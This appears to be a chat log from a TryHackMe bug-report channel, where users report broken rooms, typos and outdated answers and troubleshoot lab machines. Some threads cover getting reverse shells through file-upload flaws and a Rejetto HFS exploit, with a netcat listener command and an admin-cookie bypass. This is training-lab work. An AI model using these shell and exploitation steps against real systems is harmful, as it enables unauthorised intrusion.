@dusky junco ^
Works fone for me though
@raven ice you can try relaunching your browser and relogging in tryhackme for a good measure
ok thx!!
Hi, I've just finished the room brainstorm, and I wasn't able to get the 1st question (About the number of ports) correct.
I've ran multiple nmap and they always give the same number of ports, and it's twice less than what the expected answer is.
I've been looking at some writeups, and in the nmap output (like from TCM) it only shows the same few ports (ie. less than what the expected answer is)
I've seen messages of other people being also confused about this.
Hey!! Probably it is not really a bug, but rather the effect of changes in general, but in Shodan room, first question in task 3 does not accept correct answer. https://tryhackme.com/room/shodan
Learn about Shodan.io and how to use it for devices enumeration - is your coffee machine publicly accessible?
hi, not sure if this is a bug. I'm in the network services 2 room doing task 4 exploiting NFS. After I ssh into the machine and ran the bash file, I got the root access. But the root flag file isn't there
sorry nvm i figured it out
Hi ((: did the steps that @harsh oyster recommended work by any chance? This looks like something you'll have to email support@tryhackme.com about. Could you include this screenshot (#room-bugs message) & your THM username please? Thankss!
Wanted to raise this concern...it seems to be some issue with this room
@green steppe shodan go brokey
is there an issue with RootMe room? I am connected with openvpn and the IP of the box it gives me doesn't seem to be working.
trying through the attackbox now to see if there is an issue.
Hey guys, I found out it's possible to bypass the challenge for OWASP top 10 - task 25 - #2 (Admin cookie)
You get logged into the page as admin if you go to /admin without a cookie
I am unable to open vulnversiry and blue room in offensive pen test path, everything else opens just fine
I tried different browsers, PCs etc.
That's a site bug
The osquery room is so broken. Is this a known thing?
99% of the time, the room isn't broken and it's user error
If you're trying to report a bug, please provide details
I'm just making sure it's not a known problem. I've been working on this thing since yesterday and almost nothing works as it says in the description. I'll grab some examples.
Task 9
From this point forward, osqueryi becomes unusable and has to be killed. Half the tables I try to query cause this.
After a few of those, the entire machine becomes unusable (100% CPU). I have restarted mine at least 10 times already.
and here we go again:
Mhm I can't remember if that room came out before the base image changes
I'll benchmark out of curiosity, might just need switching to a t3.small cc @obsidian kiln @hardy tendon
One more thing that happened yesterday: when I opened the web interface for Kolide and clicked on "add new host", there was no "Osquery Enroll Secret". Since I didnβt know it was supposed to be there, I've spent an hour trying to find it somewhere else.
Finally I decided to restart the machine, and this time it was there.
Thank you
Gave +1 Rep to @dusky junco
https://tryhackme.com/room/blue isnt loading?
Good day,
I just finish (All In One) room and found it's not vulnerable in Arbitrary File Upload as mentioned in official write-up by the room creator
I try it with Metasploit and Try it Manually
Vulnerable version is 3.1.3 and the version in the room is 3.1.7 (up-to-date)
why one of the room name "Blue" is keep loading?
It is a site bug.
is it going to get fixed?
Probably.
okay thanks
Gave +1 Rep to @eternal summit
in Advent of Cyber 1, supporting materials for Task 24, the explanation of the && control operator is either incorrect or the author is trying to say something else. It reads: "The && operator is used with more than one command e.g. ls && pwd. The second command only executes if the first command and the second command is successful. You can pass an input containing && other-command and the backend would successfully execute it if both commands ran successfully."
"The second command only executes if the first command and the second command is successful." - maybe they are trying to say something I'm not expecting ? But I read it as "if the second command is not successful, it does not execute", as if we were talking about a transaction. The same again at the end of the paragraph
If we are trying to explain that the exit status will only be 0 if both commands are successful, that would be correct indeed. But I don't think it is what is intended, in the context of the xmas task
what they are talking about is called short-circuit evaluation, but it's worded incorrectly
with &&, if the first statement is false, the second statement is never executed, because there's no way the conjunction can be true. Similarly, with ||, if the first statement is true, the second statement does not need to be executed, because the overall statement will still be true.
Hello,
This room is private, it's normal ?
https://tryhackme.com/room/zthlinux
many of the linux walkthrough rooms have been updated and the older ones made private
Hi Folks, just a question...
you should probably say your question π
Hey everyone,
In the room "how websites work" there is a sort of popup that gives tips, with two button "back" and "next". The first tip is getting hidden due to its position. The content is unreadable there
I might be wrong, but I think task 7 of the rpmetasploit room needs updating - On metasploit v6.0.48-dev, searching for "server/socks5" returns no results, but searching for "socks" returns "auxiliary/server/socks_proxy" as well as "socks_unc" and "sockso_traversal". Can anyone confirm or is this a bug on my end?
the msf modules have been renamed since that room was releasesd
I see, thanks!
Hi there, that might be down to your resolution on your webbrowser. I had a similar issue before and resolved it using the zoom function
I'll give it a try. Thanks
Gave +1 Rep to @hollow vector
That's a site bug
Wait for it to be fixed.
is it me or the image is not loading?
https://tryhackme.com/room/xss
tried refreshing a lot, used different browsers
yessir
Anyone done Corp recently? It says the Admin accounts expired
Yeah, you need to reset the password
mmm tried that but it just fails, Ill try again
wow, worked that time.... the qwerty was not strong with me tonight. thanks
Osquery room is broken yet again,
the CMD command for starting the endpoint monitor in step 6
launcher.exe --hostname=127.0.0.1:8080 --enroll_secret=k3hFh30bUrU7nAC3DmsCCyb1mT8HoDkt --insecure
does not work, seems to be a path issue.
launcher.exe --hostname=127.0.0.1:8080 --enroll_secret=k3hFh30bUrU7nAC3DmsCCyb1mT8HoDkt --insecure --osqueryd_path="C:\Users\Administrator\Desktop\launcher\windows\osqueryd.exe"
works, but still crashes and doesn't connect back to fleet
Fix
Okay, so osquery Task9 - Q6, I checked the date in windows defender, made sure the format is good but still no good, literally tried adding in all the possible second combinations. Should I look for a solution in osquery?
2021-03-31 17:51:09 or 2021-03-31 17:50:44
the only 2 dates that are in the event logs, none work, this box is crying for help, at least give it 2 cpu's.
I went through that problem. I found the accepted date using the XML view in Event Viewer. It's a few hours away from one of those two, so I'm thinking it's a time zone issue?
I've had all sorts of problems with this room. Definitely the worst one I've done so far.
issue with task 4 exploiting nfs - https://tryhackme.com/room/networkservices2 .
this is my output when I run bash
Not a bug. You downloaded it incorrectly.
oh
if you want to use wget then: wget https://github.com/polo-sec/writing/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash?raw=true
You might wanna rename it afterwards
@soft terrace thanks, I was missing the ?raw=true portion
Gave +1 Rep to @soft terrace
If you want to download something with wget from github click on raw first
Fixed thanks ((:
Gave +1 Rep to @thorn forge
In splunk room, https://tryhackme.com/room/bpsplunk
Task 2 last question, the answer it accepts is ||answers.splunk.com||
But splunk has changed the url to|| community.splunk.com||
In the owasptop10, task 20 and the last question on XSS, the answer was actually placed in the hint section, please rectify it. It should be hint not pure/plain answer
throwback: Fetching certificate, never gets downloaded or offered to me
can you open up the dev console and see if there's any errors? @sharp wave
Hello,
I think the "Enterprize" box is experiencing an error in the CMS used and exploitable, after a few seconds of navigation shows on all pages the error "Oops, an error occurred!".
PS: In order not to make spoiler, I don't want to give exact details.
@real rover #room-help
Room: https://tryhackme.com/room/torforbeginners
Task: 3
The link to the tor browser installation guide for kali is broken.
https://hackingpress.com seems to be down for some SSL certificate issues.
owasp juice shop room task 4- im logging in with the admin user and pass but not getting the flag
nvm it just wasnt updating for some reason
Heyo! I am doing OWASP room, task 26, [Severity 8] Insecure Deserialization - Code Execution, and something is wrong with the webapp, I am getting 500 on feedback subpage :/ I am using AttackMachine.
I could make an account, see cookies, got to admin panel, all kinds of stuff, but then this.
probably not a room bug. Just means the service is encountering an error, which could be related to something you just did. It's been a while since I did that room, so I don't recall that task very well
Ok, I will try to kill machine and spawn another one then, and we will see if it still happens. I di not really 'mess' with anything, just watch cookies and went to admin panel by changing directory, no hacking anything really.
hm
perhaps it requires that you're auth'd first, and that's why it is returning an error? Again, just guessing here, as I don't have that room in front of me
I do not know. I killed machine, deployed a new one, only made an account at this web, and 500 again π¦
well, I will do other tasks for now.
let's jump over to #room-help
ok
in the attacktivedirectory room, in task2, the instructions for installing impacket are wrong, as sudo cd isnt a command, it's just cd, sorry if this doenst classify in this channel
@viral cobalt
smh, y'all think I know how sudo works? I run everything as root!
I mean, just sudo su at the start
it's fixed, nematode!
sudo judo
trying to start the upload vulnerabilities room
i copied the command they give me in my terminal but doesnt seem to be working
open your /etc/hosts file and make sure it's been updated correctly. And use the site names, not the IPs, in your browser (with http://).
ok my hosts file is good i think
it says to do the what the shell room first anyways so i might do that
You have multiple entries for the same hosts, you want to delete them so that there is only one
O
you've run that command multiple times
but now your computer doesn't know which IP it should point to
could i just delete the file and redo the command?
So, not a room bug :). Let's hop over to #room-help
okey
Hey everyone, I am having an issue with the non-metasploit portion of the Steel Mountain room. When I use the recommended exploit for the rejetto HTTP file server (https://www.exploit-db.com/exploits/39161) to upload netcat and execute it to get a reverse shell, it seems like netcat on the target machine never executes because I never get a connection back on my machine.
I can see successful GET requests on the python web server for nc.exe on my machine, so its definitely uploading netcat to the target machine.
I've tried restarting my machine, restarting the attack machine, and have ensured that I'm using the correct IPs and ports.
Anyone have any ideas if this is a bug or if I'm doing something wrong? I checked some writeups and they did it the same way as me with no issues, so I'm not sure..
https://imgur.com/a/Cncb1HF some screenshots to see what I am doing.
Hi, Recently i have joined this course and want to join room 'HackPark' but its not loading tried every browser cleared cache everything but not loading.. please resolve this issue ASAP....
Where is flag4 ? Linux challenges
Hi! I don't know if anyone has the same issue but I am unable to enter Learn Rust room
Already tried a lot and it's always stuck loading
I have been trying for the past 5 days and it's always the same
@hot flame same happened with me in hackpark room
Again, site bug.
In the owasptop10 room one of the questions being asked is who developed the tomcat application. However it's not accepting the answer, even after I added "The" before it
Not a bug, your answer is probably just wrong.
Ok
Hello, don't know if this the right section. I'm trying to play with the For Business Reason by MsMouse but the wordpress site is extremely slow and basically can't do anything in it. Anyone recently had the same experience or is just me? Thank you.
year of jellyfish shell not comeng
Δ± try everything
Δ± try attackbox my mainos bot
shell not comeing
Unlikely to be a bug with the room, much more likely to be user error. Have you checked the writeups?
yes Δ± check
Δ± upload my shell
but shell not comeing
Δ± can send my payload
It sounds like you should be in #room-help first, until you're actually certain that the room is not working correctly.
The room won't have changed.
That's not a room bug -- it's you either not understanding what's going on, or not enumerating properly
Room has not changed, and it's specifically designed to be very difficult to get a shell back from
I have room bug to report on Upload Vulns final task.
cc @obsidian kiln this hasn't changed, has it?
im getting the 'module not found' error. You said in #room-help that its a magic number issue but theres no magic number in the file i uploaded.
file uploaded minus the ip
command typed following enum of the propper name
the error
it appears to hang like its going to connect to my nc listener and then it spits that error at me every time. Ive been trying it for 2 days with no change in error
@obsidian kiln this is the middle of day 3 so im a bit frustrated. lol
@wraith ice you appear to be missing an IP address in that payload
as i said in the caption, i removed the ip for that screenshot. idk if i can share the thm openvpn ip
but i can show it to you with the ip as it was uploaded.
@obsidian kiln
What's the box IP address?
10.10.105.60
Let's take a look π
awesome, thanks mane.
Do you have netcat started?
I'd love for it to be something I'm missing but I'm 99% sure I've tried everything at this point. I've followed guides, done my own troubleshooting, and came here as an absolute last resort.
yes nc -lvnp 4444
i have 2 running
so i have a 4444 and 443 running neither of them are currently connected
Anything come through on the 443 one now?
negative
Okay, so there's something in the way at the network layer there
What OS are you using?
Kali shouldn't have a firewall in the way. Hm
Start a webserver for me?
Just a python3 -m http.server
VPN running directly in the VM?
Yeah, that's a good shout. VPN is connected from the VM, right?
yes
Any other VPNs on the host?
I've seen having an external VPN active on the host mess with this challenge in particular for some reason
oh yes!
i just closed it out but i did have one running on host
ok webserver is started
What port?
8000
Okay, so definitely connects back
yeah i just saw you connect
Try starting a netcat listener on port 8000?
retrying local 0.0.0.0:8000 : Address already in use
Stop the webserver first
I suspect backgrounded servers still hold on to their port
That connect back?
yes
So I wonder why 443 wasn't working. Odd
Give me a sec -- I'll update one of your shells in the container to try port 8000
well i also have the one on 4444
Right, start a netcat listener on port 8000 and try MMK.jpg?
Oh, Node does not like that shell
This is why it's failing
You sure you didn't mess with that magic number? I can't check it in this container
it depends which file youre messing with. like i said ive tried with and without. the one that im certain contains no magic number is CVG.jpg
CVG.jpg -- will try that one π
that on is pointing back to 4444 and is the one i screenshotted for you earlier
Yep. Try a listener on port 8000 for me?
This one has had its magic number edited as well
I'll try a completely blank version
Oh, that's not the magic number error
That's because you missed the bracket at the start of the shell
thats the one i sent you earlier. it was directly copied from the linked guide. pasted in to gedit ip and port added and saved as shell.jpg
I'm going to have to kill it in a second given I activated it manually and can't keep the terminal open forever -- you can activate it again with ../content/test.jpg though
yeah i gotchu. thanks for your help man. i really appreciate it
No problem π
works like a charm. quick question. Do all js functions start with an opening bracket before function? or is it just this shell.
because i did do a search for a .js shebang to look it over. clearly i missed that but im just asking for future knowledge
only if they're self invoked, so no not always
@sonic willow so if the script called for it to be a self contained thing you would but if the use case didnt require it you wouldnt, right?
yeah exactly, see this post on why you would need one :)
https://stackoverflow.com/questions/592396/what-is-the-purpose-of-a-self-executing-function-in-javascript
Nah, it's just telling it to execute as soon as the script is called -- self-invoked, as Jake called it
I have try the OpenVAS room in THM and a little bit confused because the report that I get is different from the actual answer in that room. link of OpenVAS room https://tryhackme.com/room/openvas #PS in the OpenVAS room the installation procedure maybe outdated and didn't work with the new version of OpenVAS especially in default credentials.
XSS is working in OWASP-Juice-Shop but the flag isn't displaying. I've followed the troubleshooting included in the first part of the room with no luck.
https://tryhackme.com/room/windowsfundamentals1xbx - task 10
Hence, Task 8 ended with a detailed blog post explaining the Task Manager in great detail. - task 9 covers the task manager
should be: Hence, Task 9 ended with a detailed blog post explaining the Task Manager in great detail.
in room corp you can't click on search and windows bottons therefore you can't open a prompt
Do you need one? This sounds like a bug with your RDP client NGL.
Thought I'd subscribe, try out the service and start from the very beginning. Not a bug as such, just a typo - https://tryhackme.com/room/beginnerpathintro. When doing the Network Security task it states The air conditioning units where not directly owned by Target it should be ***were ***not where. Not too sure if you want feedback on anything like this or if this was the correct channel but thought I'd mention it.
Yep, feedback for this is appreciated. Thanks @smoky dew π
Gave +1 Rep to @smoky dew
Ah, Damn. Can't fix that bit.
@glad badger, enjoy.
https://tryhackme.com/room/beginnerpathintro
First site:
Second website: were not where
There is a small typo in the JavaScript room, after the break it's a normal colon and not a semicolon. It leads to an Unexpected token error when running the code
Task 3 - Conditionals
I think I have those on my list, those are all related to the Static Site lab pages?
Aye
This isn't really a bug, but a suggestion to turn updates off on gdb pwngdb on the cod caper room, when you first run it, the tool trys to update and hangs for some time.
I am trying to upgrade the shell to meterpreter, but keep running into a Post Failed error and haven't been able to find a solution.
is the theseus room page broken? last think I have on the page is "answer questions below" but no fields to input answers or anything.
no errors in web console. tested with chrome in win10 and kali linux
Leave and rejoin the room
I can make a change
No problemo
in the room Corp there is a problem. connecting to internet, Invoke-WebRequest doesn't function
CategoryInfo: Not Specified: (:) [], MethodInvocationExeption
FullyQualifiedErrorId: WebExeption
youre attempting to use the command directly from the room
the command downloads from a URL, targets on the THM range dont have access to the internet
you will have to host the tool from your localhost
thanks. Pretty annoying that I had to drop out of the room though as I loose all the progress
Gave +1 Rep to @hazy tiger
You don't lose progress when you leave and re-join a room...?
I'm slightly confused π
makes sense
well the servers gets reset so all rev shells etc will get killed
You could have noted the flags down and inputted them after completion :)
yeah well
both sites updated (takes about 5-10mins to update through CDN, etc) thanks cc @smoky dew
Gave +1 Rep to @obsidian kiln
There seems to be an issue with the text in this room. the text isn't complete am confused what am supposed to can someone please look into this. Thanks
Need Help For Sakura Room by OSINT Dojo
Is the Onion site up?
I mean the Deep Paste
I don't think it's up anymore.
Actually I solved that room in april.
But today I was making a video walk-through
Then I discovered that the onion site is not working any more
Any THM Staff available to verify this problem?
Can you DM me the site that you're expecting to visit? As well as the task & question number that you're on π
π
It looks like our attacker got in via Remote File Inclusion (RFI). It's best to look around the system itself now for any evidence of persistence mechanisms that could lead to a payload. There are multiple ways to maintain persistence in most Linux distributions including but not limited to:
Room: https://tryhackme.com/room/bpsplunk
Task: 2, Question: 31
I think the accepted answer should be changed to "community.splunk.com" as "answers.splunk.com" redirects to the above.
Thanks, updated ((:
Gave +1 Rep to @tiny ginkgo
Good find
Linux Fundamentals Part 1 says the machine supposed to start in my browser but that doesn't happen
Do you have this button at the top of the page @soft ice?
π
Room: https://tryhackme.com/room/retro, after doing an nmap scan it wont show an open port 80 so the gobuster enumeration also wont work, checked the writeup and i think it should be open
How long has the machine been started for?
about 15 min
That should be enough time to start
Give it another five, just to be safe, then try redeploying
Typo in the new Windows Fundamentals 2, task 1:
In Windows Fundamental 1
Should be plural
Fixed. Thank you for reporting. π
Gave +1 Rep to @zealous vortex
is the haskHell room having problems? I no matter what haskell script I upload, it just throws internal server error.
for the fun of it I tried uploading a script from one of the writeups (and even the rev-shell from the author of the room - same problem
did try to restart the server a few times
Hi all, I am working on XSS exploitation on the XSS Playground Room. I am on Task 5 DOM Based XSS, I was able to get the onmouseover to work and display my cookie on an alert pop-up... but I see no flag to enter for the answer... I am unsure what to do
am having an issue with the bounty hunter box. i cant seem to download the files from the ftp server. i tried wget to download the files but it wasn't successful, the connection was successful but ended up hanging after
im doing the upload vulnerabilities room on my VM and im getting an error when trying to load overwrite.uploadvulns.thm or the ip of the room
im getting server not found
@green heart #room-help
Not a bug, you've missed a step
You're not meant to access it by IP either
i see, thank you
I might be wrong, but shouldn't be 'What is the path..'
Little typo in the Task 2 of " What is Networking " that just have been released by cmnatic, it's Tim Berners-Lee not Bernes
Resolved, thank you (:
Gave +1 Rep to @night yew
You're welcome, thanks to you too CM 
Gave +1 Rep to @dusky junco
Hello
On the new release room
at the ending
the href to Extending Your Network room
is including room too
Updated π ty
Gave +1 Rep to @steady shuttle
You're welcome π
red pill also works and then the format is correct :)
Hello, I found a bug on the room Smag Grotto., which will reveal the root flag to the user without gaining root.
Should I DM someone, or how should I report the bug?
thx
@sonic willow if you're interested
o that's a throwback
thank you:)
Gave +1 Rep to @eternal summit
hey sure, i made the room, drop me a dm
Thanks
Gave +1 Rep to @eternal summit
I think there is a bug in the Packets & Frames room. I am putting in the correct s,sa,a form for the three way handshake and it is not taking the answer.
it should work with no spaces
Spaces.... THank you!
I'm getting an "internal server error" on the OWASP Top 10 room, Task 26.
I try to click on the "feedback" link, get that error, and the "encodedpayload" cookie never shows up.
I've also tried to search for it with "{ip}/feedback"
I'm no English major, but I think this is meant to be caused? Room: DNS Manipulation, task 8
I'm having trouble connecting to the attackbox at burp suite room
The deployed attack box is laggy and sometimes the mouse moves on its own
I didn't click anything yet the mouse cursor close a window
I tried switching device, and it's still laggy
The other rooms isn't as laggy as this one
Nvm the other rooms are just as laggy
add the cert to your browser
this room has a lot of issues
idk if it's normal but i get the error : Microsoft Windows [Version 10.0.17763.1637] on the Wreath room task 40 when i try to get the reverse shell
i received 1 badge 6 times(cat Linux.txt). is this bug or ....?
Re : room Brainstorm, does anyone know why port 3389 is open ?
On the room Kenobi (Task 3 Gain initial access with ProFtpd) second question the number of exploit changed from 3 to 4
https://tryhackme.com/room/iso27001 Should say "Requirements"
^+ Not to sound rude, not sure on the best way to phrase it but this box could do with a few spelling/grammar checks.
Hey! That's not a problem, if I just bug @dusky junco to come take a look π